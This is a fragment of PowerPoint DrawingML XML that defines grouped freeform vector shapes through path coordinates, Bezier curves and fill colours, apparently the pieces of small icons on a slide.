                  <a:gd name="T7" fmla="*/ 1656 h 1819"/>
                  <a:gd name="T8" fmla="*/ 600 w 600"/>
                  <a:gd name="T9" fmla="*/ 0 h 18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0" h="1819">
                    <a:moveTo>
                      <a:pt x="600" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="1656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="0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728" name="Freeform 415">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCD58F46-C7F7-43A8-976B-9D0AE1C8DC21}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="8488648" y="1908078"/>
              <a:ext cx="1738528" cy="468065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CACACA"/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chemeClr val="bg1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729" name="Group 913">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFA8C117-AC59-43F1-B844-BA88021A6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9474" y="1549673"/>
              <a:ext cx="254093" cy="419921"/>
              <a:chOff x="4140" y="1950"/>
              <a:chExt cx="190" cy="314"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1795" name="Freeform 911">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AD46283-5843-46F9-A9CE-7609BAD5E38E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4235" y="1976"/>
                <a:ext cx="95" cy="288"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 600"/>
                  <a:gd name="T1" fmla="*/ 161 h 1817"/>
                  <a:gd name="T2" fmla="*/ 0 w 600"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1817"/>
                  <a:gd name="T4" fmla="*/ 600 w 600"/>
                  <a:gd name="T5" fmla="*/ 1656 h 1817"/>
                  <a:gd name="T6" fmla="*/ 600 w 600"/>
                  <a:gd name="T7" fmla="*/ 0 h 1817"/>
                  <a:gd name="T8" fmla="*/ 0 w 600"/>
                  <a:gd name="T9" fmla="*/ 161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0" h="1817">
                    <a:moveTo>
                      <a:pt x="0" y="161"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="1656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="161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96" name="Freeform 912">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB120531-6FC0-4503-B2D7-800AAFD171C9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4140" y="1950"/>
                <a:ext cx="95" cy="289"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 600 w 600"/>
                  <a:gd name="T1" fmla="*/ 0 h 1819"/>
                  <a:gd name="T2" fmla="*/ 0 w 600"/>
                  <a:gd name="T3" fmla="*/ 163 h 1819"/>
                  <a:gd name="T4" fmla="*/ 0 w 600"/>
                  <a:gd name="T5" fmla="*/ 1819 h 1819"/>
                  <a:gd name="T6" fmla="*/ 600 w 600"/>
                  <a:gd name="T7" fmla="*/ 1656 h 1819"/>
                  <a:gd name="T8" fmla="*/ 600 w 600"/>
                  <a:gd name="T9" fmla="*/ 0 h 18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0" h="1819">
                    <a:moveTo>
                      <a:pt x="600" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="1656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="0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730" name="Group 490">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75954684-3E00-42E0-9A4C-09E1F2446BE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520818" y="1781291"/>
              <a:ext cx="179202" cy="431957"/>
              <a:chOff x="558" y="-2537"/>
              <a:chExt cx="470" cy="1139"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1782" name="Freeform 491">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFE8A259-7C4A-41D2-9D1C-0B62978B327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78" y="-1977"/>
                <a:ext cx="211" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62 w 89"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 11 w 89"/>
                  <a:gd name="T3" fmla="*/ 11 h 245"/>
                  <a:gd name="T4" fmla="*/ 2 w 89"/>
                  <a:gd name="T5" fmla="*/ 0 h 245"/>
                  <a:gd name="T6" fmla="*/ 2 w 89"/>
                  <a:gd name="T7" fmla="*/ 36 h 245"/>
                  <a:gd name="T8" fmla="*/ 2 w 89"/>
                  <a:gd name="T9" fmla="*/ 206 h 245"/>
                  <a:gd name="T10" fmla="*/ 43 w 89"/>
                  <a:gd name="T11" fmla="*/ 205 h 245"/>
                  <a:gd name="T12" fmla="*/ 43 w 89"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88 w 89"/>
                  <a:gd name="T15" fmla="*/ 218 h 245"/>
                  <a:gd name="T16" fmla="*/ 88 w 89"/>
                  <a:gd name="T17" fmla="*/ 156 h 245"/>
                  <a:gd name="T18" fmla="*/ 89 w 89"/>
                  <a:gd name="T19" fmla="*/ 7 h 245"/>
                  <a:gd name="T20" fmla="*/ 89 w 89"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 89"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 62 w 89"/>
                  <a:gd name="T25" fmla="*/ 2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9" h="245">
                    <a:moveTo>
                      <a:pt x="62" y="20"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="20"/>
                      <a:pt x="24" y="13"/>
                      <a:pt x="11" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="10"/>
                      <a:pt x="3" y="5"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="18"/>
                      <a:pt x="2" y="32"/>
                      <a:pt x="2" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="49"/>
                      <a:pt x="0" y="181"/>
                      <a:pt x="2" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="229"/>
                      <a:pt x="43" y="225"/>
                      <a:pt x="43" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="207"/>
                      <a:pt x="43" y="211"/>
                      <a:pt x="43" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="245"/>
                      <a:pt x="86" y="235"/>
                      <a:pt x="88" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="201"/>
                      <a:pt x="88" y="171"/>
                      <a:pt x="88" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="141"/>
                      <a:pt x="89" y="47"/>
                      <a:pt x="89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6" y="16"/>
                      <a:pt x="70" y="22"/>
                      <a:pt x="62" y="20"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="39A962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83" name="Freeform 492">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F21985A-31C1-480B-9577-EF0167A4A8B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78" y="-1977"/>
                <a:ext cx="211" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62 w 89"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 11 w 89"/>
                  <a:gd name="T3" fmla="*/ 11 h 245"/>
                  <a:gd name="T4" fmla="*/ 2 w 89"/>
                  <a:gd name="T5" fmla="*/ 0 h 245"/>
                  <a:gd name="T6" fmla="*/ 2 w 89"/>
                  <a:gd name="T7" fmla="*/ 36 h 245"/>
                  <a:gd name="T8" fmla="*/ 2 w 89"/>
                  <a:gd name="T9" fmla="*/ 206 h 245"/>
                  <a:gd name="T10" fmla="*/ 43 w 89"/>
                  <a:gd name="T11" fmla="*/ 205 h 245"/>
                  <a:gd name="T12" fmla="*/ 43 w 89"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88 w 89"/>
                  <a:gd name="T15" fmla="*/ 218 h 245"/>
                  <a:gd name="T16" fmla="*/ 88 w 89"/>
                  <a:gd name="T17" fmla="*/ 156 h 245"/>
                  <a:gd name="T18" fmla="*/ 89 w 89"/>
                  <a:gd name="T19" fmla="*/ 7 h 245"/>
                  <a:gd name="T20" fmla="*/ 89 w 89"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 89"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 62 w 89"/>
                  <a:gd name="T25" fmla="*/ 2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9" h="245">
                    <a:moveTo>
                      <a:pt x="62" y="20"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="20"/>
                      <a:pt x="24" y="13"/>
                      <a:pt x="11" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="10"/>
                      <a:pt x="3" y="5"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="18"/>
                      <a:pt x="2" y="32"/>
                      <a:pt x="2" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="49"/>
                      <a:pt x="0" y="181"/>
                      <a:pt x="2" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="229"/>
                      <a:pt x="43" y="225"/>
                      <a:pt x="43" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="207"/>
                      <a:pt x="43" y="211"/>
                      <a:pt x="43" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="245"/>
                      <a:pt x="86" y="235"/>
                      <a:pt x="88" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="201"/>
                      <a:pt x="88" y="171"/>
                      <a:pt x="88" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="141"/>
                      <a:pt x="89" y="47"/>
                      <a:pt x="89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6" y="16"/>
                      <a:pt x="70" y="22"/>
                      <a:pt x="62" y="20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84" name="Freeform 493">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01CFE738-B01E-4E4D-AF14-9963EEBEF51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8" y="-2365"/>
                <a:ext cx="470" cy="548"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 193 w 199"/>
                  <a:gd name="T1" fmla="*/ 194 h 232"/>
                  <a:gd name="T2" fmla="*/ 169 w 199"/>
                  <a:gd name="T3" fmla="*/ 49 h 232"/>
                  <a:gd name="T4" fmla="*/ 143 w 199"/>
                  <a:gd name="T5" fmla="*/ 24 h 232"/>
                  <a:gd name="T6" fmla="*/ 100 w 199"/>
                  <a:gd name="T7" fmla="*/ 13 h 232"/>
                  <a:gd name="T8" fmla="*/ 60 w 199"/>
                  <a:gd name="T9" fmla="*/ 2 h 232"/>
                  <a:gd name="T10" fmla="*/ 31 w 199"/>
                  <a:gd name="T11" fmla="*/ 12 h 232"/>
                  <a:gd name="T12" fmla="*/ 4 w 199"/>
                  <a:gd name="T13" fmla="*/ 159 h 232"/>
                  <a:gd name="T14" fmla="*/ 36 w 199"/>
                  <a:gd name="T15" fmla="*/ 168 h 232"/>
                  <a:gd name="T16" fmla="*/ 54 w 199"/>
                  <a:gd name="T17" fmla="*/ 47 h 232"/>
                  <a:gd name="T18" fmla="*/ 53 w 199"/>
                  <a:gd name="T19" fmla="*/ 164 h 232"/>
                  <a:gd name="T20" fmla="*/ 63 w 199"/>
                  <a:gd name="T21" fmla="*/ 175 h 232"/>
                  <a:gd name="T22" fmla="*/ 113 w 199"/>
                  <a:gd name="T23" fmla="*/ 189 h 232"/>
                  <a:gd name="T24" fmla="*/ 140 w 199"/>
                  <a:gd name="T25" fmla="*/ 169 h 232"/>
                  <a:gd name="T26" fmla="*/ 140 w 199"/>
                  <a:gd name="T27" fmla="*/ 169 h 232"/>
                  <a:gd name="T28" fmla="*/ 138 w 199"/>
                  <a:gd name="T29" fmla="*/ 88 h 232"/>
                  <a:gd name="T30" fmla="*/ 136 w 199"/>
                  <a:gd name="T31" fmla="*/ 71 h 232"/>
                  <a:gd name="T32" fmla="*/ 136 w 199"/>
                  <a:gd name="T33" fmla="*/ 70 h 232"/>
                  <a:gd name="T34" fmla="*/ 136 w 199"/>
                  <a:gd name="T35" fmla="*/ 71 h 232"/>
                  <a:gd name="T36" fmla="*/ 138 w 199"/>
                  <a:gd name="T37" fmla="*/ 88 h 232"/>
                  <a:gd name="T38" fmla="*/ 160 w 199"/>
                  <a:gd name="T39" fmla="*/ 204 h 232"/>
                  <a:gd name="T40" fmla="*/ 193 w 199"/>
                  <a:gd name="T41" fmla="*/ 194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9" h="232">
                    <a:moveTo>
                      <a:pt x="193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7"/>
                      <a:pt x="143" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="21"/>
                      <a:pt x="113" y="16"/>
                      <a:pt x="100" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="10"/>
                      <a:pt x="69" y="4"/>
                      <a:pt x="60" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="0"/>
                      <a:pt x="34" y="4"/>
                      <a:pt x="31" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="17"/>
                      <a:pt x="8" y="139"/>
                      <a:pt x="4" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="181"/>
                      <a:pt x="31" y="184"/>
                      <a:pt x="36" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="158"/>
                      <a:pt x="55" y="38"/>
                      <a:pt x="54" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="53"/>
                      <a:pt x="53" y="122"/>
                      <a:pt x="53" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="169"/>
                      <a:pt x="56" y="174"/>
                      <a:pt x="63" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="177"/>
                      <a:pt x="106" y="187"/>
                      <a:pt x="113" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="190"/>
                      <a:pt x="137" y="181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1"/>
                      <a:pt x="138" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="79"/>
                      <a:pt x="137" y="74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0"/>
                      <a:pt x="136" y="70"/>
                      <a:pt x="136" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="76"/>
                      <a:pt x="138" y="82"/>
                      <a:pt x="138" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="142" y="110"/>
                      <a:pt x="148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85" name="Freeform 494">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC8FE583-5A31-4F5C-9138-215F541F4C4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8" y="-2365"/>
                <a:ext cx="470" cy="548"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 193 w 199"/>
                  <a:gd name="T1" fmla="*/ 194 h 232"/>
                  <a:gd name="T2" fmla="*/ 169 w 199"/>
                  <a:gd name="T3" fmla="*/ 49 h 232"/>
                  <a:gd name="T4" fmla="*/ 143 w 199"/>
                  <a:gd name="T5" fmla="*/ 24 h 232"/>
                  <a:gd name="T6" fmla="*/ 100 w 199"/>
                  <a:gd name="T7" fmla="*/ 13 h 232"/>
                  <a:gd name="T8" fmla="*/ 60 w 199"/>
                  <a:gd name="T9" fmla="*/ 2 h 232"/>
                  <a:gd name="T10" fmla="*/ 31 w 199"/>
                  <a:gd name="T11" fmla="*/ 12 h 232"/>
                  <a:gd name="T12" fmla="*/ 4 w 199"/>
                  <a:gd name="T13" fmla="*/ 159 h 232"/>
                  <a:gd name="T14" fmla="*/ 36 w 199"/>
                  <a:gd name="T15" fmla="*/ 168 h 232"/>
                  <a:gd name="T16" fmla="*/ 54 w 199"/>
                  <a:gd name="T17" fmla="*/ 47 h 232"/>
                  <a:gd name="T18" fmla="*/ 53 w 199"/>
                  <a:gd name="T19" fmla="*/ 164 h 232"/>
                  <a:gd name="T20" fmla="*/ 63 w 199"/>
                  <a:gd name="T21" fmla="*/ 175 h 232"/>
                  <a:gd name="T22" fmla="*/ 113 w 199"/>
                  <a:gd name="T23" fmla="*/ 189 h 232"/>
                  <a:gd name="T24" fmla="*/ 140 w 199"/>
                  <a:gd name="T25" fmla="*/ 169 h 232"/>
                  <a:gd name="T26" fmla="*/ 140 w 199"/>
                  <a:gd name="T27" fmla="*/ 169 h 232"/>
                  <a:gd name="T28" fmla="*/ 138 w 199"/>
                  <a:gd name="T29" fmla="*/ 88 h 232"/>
                  <a:gd name="T30" fmla="*/ 136 w 199"/>
                  <a:gd name="T31" fmla="*/ 71 h 232"/>
                  <a:gd name="T32" fmla="*/ 136 w 199"/>
                  <a:gd name="T33" fmla="*/ 70 h 232"/>
                  <a:gd name="T34" fmla="*/ 136 w 199"/>
                  <a:gd name="T35" fmla="*/ 71 h 232"/>
                  <a:gd name="T36" fmla="*/ 138 w 199"/>
                  <a:gd name="T37" fmla="*/ 88 h 232"/>
                  <a:gd name="T38" fmla="*/ 160 w 199"/>
                  <a:gd name="T39" fmla="*/ 204 h 232"/>
                  <a:gd name="T40" fmla="*/ 193 w 199"/>
                  <a:gd name="T41" fmla="*/ 194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9" h="232">
                    <a:moveTo>
                      <a:pt x="193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7"/>
                      <a:pt x="143" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="21"/>
                      <a:pt x="113" y="16"/>
                      <a:pt x="100" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="10"/>
                      <a:pt x="69" y="4"/>
                      <a:pt x="60" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="0"/>
                      <a:pt x="34" y="4"/>
                      <a:pt x="31" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="17"/>
                      <a:pt x="8" y="139"/>
                      <a:pt x="4" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="181"/>
                      <a:pt x="31" y="184"/>
                      <a:pt x="36" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="158"/>
                      <a:pt x="55" y="38"/>
                      <a:pt x="54" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="53"/>
                      <a:pt x="53" y="122"/>
                      <a:pt x="53" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="169"/>
                      <a:pt x="56" y="174"/>
                      <a:pt x="63" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="177"/>
                      <a:pt x="106" y="187"/>
                      <a:pt x="113" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="190"/>
                      <a:pt x="137" y="181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1"/>
                      <a:pt x="138" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="79"/>
                      <a:pt x="137" y="74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0"/>
                      <a:pt x="136" y="70"/>
                      <a:pt x="136" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="76"/>
                      <a:pt x="138" y="82"/>
                      <a:pt x="138" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="142" y="110"/>
                      <a:pt x="148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86" name="Freeform 495">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEAAFEC2-6C05-4EF4-AE4D-CCE0FAD8EBC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761" y="-1883"/>
                <a:ext cx="24" cy="390"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 10"/>
                  <a:gd name="T1" fmla="*/ 165 h 165"/>
                  <a:gd name="T2" fmla="*/ 9 w 10"/>
                  <a:gd name="T3" fmla="*/ 11 h 165"/>
                  <a:gd name="T4" fmla="*/ 0 w 10"/>
                  <a:gd name="T5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5">
                    <a:moveTo>
                      <a:pt x="8" y="165"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="131"/>
                      <a:pt x="10" y="15"/>
                      <a:pt x="9" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="7"/>
                      <a:pt x="1" y="7"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="6350" cap="rnd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87" name="Freeform 496">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D938B2B4-8B64-423F-A8EF-D7EDD6F3894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712" y="-2391"/>
                <a:ext cx="153" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 65"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 9 w 65"/>
                  <a:gd name="T3" fmla="*/ 19 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 65"/>
                  <a:gd name="T5" fmla="*/ 12 h 41"/>
                  <a:gd name="T6" fmla="*/ 53 w 65"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 56 w 65"/>
                  <a:gd name="T9" fmla="*/ 29 h 41"/>
                  <a:gd name="T10" fmla="*/ 29 w 65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" h="41">
                    <a:moveTo>
                      <a:pt x="29" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="37"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="9" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="16"/>
                      <a:pt x="12" y="15"/>
                      <a:pt x="15" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="10"/>
                      <a:pt x="53" y="0"/>
                      <a:pt x="53" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="21"/>
                      <a:pt x="46" y="25"/>
                      <a:pt x="56" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="33"/>
                      <a:pt x="45" y="41"/>
                      <a:pt x="29" y="39"/>
                    </a:cubicBezTo>
                    <a:close/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88" name="Freeform 497">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9769E6E-7171-4D26-915C-15D2B50FF83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03" y="-2363"/>
                <a:ext cx="376" cy="447"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 150 w 159"/>
                  <a:gd name="T1" fmla="*/ 48 h 189"/>
                  <a:gd name="T2" fmla="*/ 124 w 159"/>
                  <a:gd name="T3" fmla="*/ 23 h 189"/>
                  <a:gd name="T4" fmla="*/ 123 w 159"/>
                  <a:gd name="T5" fmla="*/ 23 h 189"/>
                  <a:gd name="T6" fmla="*/ 123 w 159"/>
                  <a:gd name="T7" fmla="*/ 23 h 189"/>
                  <a:gd name="T8" fmla="*/ 123 w 159"/>
                  <a:gd name="T9" fmla="*/ 23 h 189"/>
                  <a:gd name="T10" fmla="*/ 122 w 159"/>
                  <a:gd name="T11" fmla="*/ 22 h 189"/>
                  <a:gd name="T12" fmla="*/ 122 w 159"/>
                  <a:gd name="T13" fmla="*/ 22 h 189"/>
                  <a:gd name="T14" fmla="*/ 116 w 159"/>
                  <a:gd name="T15" fmla="*/ 21 h 189"/>
                  <a:gd name="T16" fmla="*/ 116 w 159"/>
                  <a:gd name="T17" fmla="*/ 21 h 189"/>
                  <a:gd name="T18" fmla="*/ 114 w 159"/>
                  <a:gd name="T19" fmla="*/ 20 h 189"/>
                  <a:gd name="T20" fmla="*/ 113 w 159"/>
                  <a:gd name="T21" fmla="*/ 20 h 189"/>
                  <a:gd name="T22" fmla="*/ 111 w 159"/>
                  <a:gd name="T23" fmla="*/ 19 h 189"/>
                  <a:gd name="T24" fmla="*/ 109 w 159"/>
                  <a:gd name="T25" fmla="*/ 19 h 189"/>
                  <a:gd name="T26" fmla="*/ 108 w 159"/>
                  <a:gd name="T27" fmla="*/ 19 h 189"/>
                  <a:gd name="T28" fmla="*/ 106 w 159"/>
                  <a:gd name="T29" fmla="*/ 18 h 189"/>
                  <a:gd name="T30" fmla="*/ 69 w 159"/>
                  <a:gd name="T31" fmla="*/ 71 h 189"/>
                  <a:gd name="T32" fmla="*/ 68 w 159"/>
                  <a:gd name="T33" fmla="*/ 180 h 189"/>
                  <a:gd name="T34" fmla="*/ 69 w 159"/>
                  <a:gd name="T35" fmla="*/ 71 h 189"/>
                  <a:gd name="T36" fmla="*/ 67 w 159"/>
                  <a:gd name="T37" fmla="*/ 62 h 189"/>
                  <a:gd name="T38" fmla="*/ 52 w 159"/>
                  <a:gd name="T39" fmla="*/ 15 h 189"/>
                  <a:gd name="T40" fmla="*/ 52 w 159"/>
                  <a:gd name="T41" fmla="*/ 13 h 189"/>
                  <a:gd name="T42" fmla="*/ 66 w 159"/>
                  <a:gd name="T43" fmla="*/ 7 h 189"/>
                  <a:gd name="T44" fmla="*/ 55 w 159"/>
                  <a:gd name="T45" fmla="*/ 4 h 189"/>
                  <a:gd name="T46" fmla="*/ 55 w 159"/>
                  <a:gd name="T47" fmla="*/ 4 h 189"/>
                  <a:gd name="T48" fmla="*/ 41 w 159"/>
                  <a:gd name="T49" fmla="*/ 1 h 189"/>
                  <a:gd name="T50" fmla="*/ 40 w 159"/>
                  <a:gd name="T51" fmla="*/ 1 h 189"/>
                  <a:gd name="T52" fmla="*/ 12 w 159"/>
                  <a:gd name="T53" fmla="*/ 11 h 189"/>
                  <a:gd name="T54" fmla="*/ 0 w 159"/>
                  <a:gd name="T55" fmla="*/ 73 h 189"/>
                  <a:gd name="T56" fmla="*/ 30 w 159"/>
                  <a:gd name="T57" fmla="*/ 83 h 189"/>
                  <a:gd name="T58" fmla="*/ 35 w 159"/>
                  <a:gd name="T59" fmla="*/ 50 h 189"/>
                  <a:gd name="T60" fmla="*/ 34 w 159"/>
                  <a:gd name="T61" fmla="*/ 163 h 189"/>
                  <a:gd name="T62" fmla="*/ 44 w 159"/>
                  <a:gd name="T63" fmla="*/ 174 h 189"/>
                  <a:gd name="T64" fmla="*/ 94 w 159"/>
                  <a:gd name="T65" fmla="*/ 188 h 189"/>
                  <a:gd name="T66" fmla="*/ 121 w 159"/>
                  <a:gd name="T67" fmla="*/ 168 h 189"/>
                  <a:gd name="T68" fmla="*/ 121 w 159"/>
                  <a:gd name="T69" fmla="*/ 111 h 189"/>
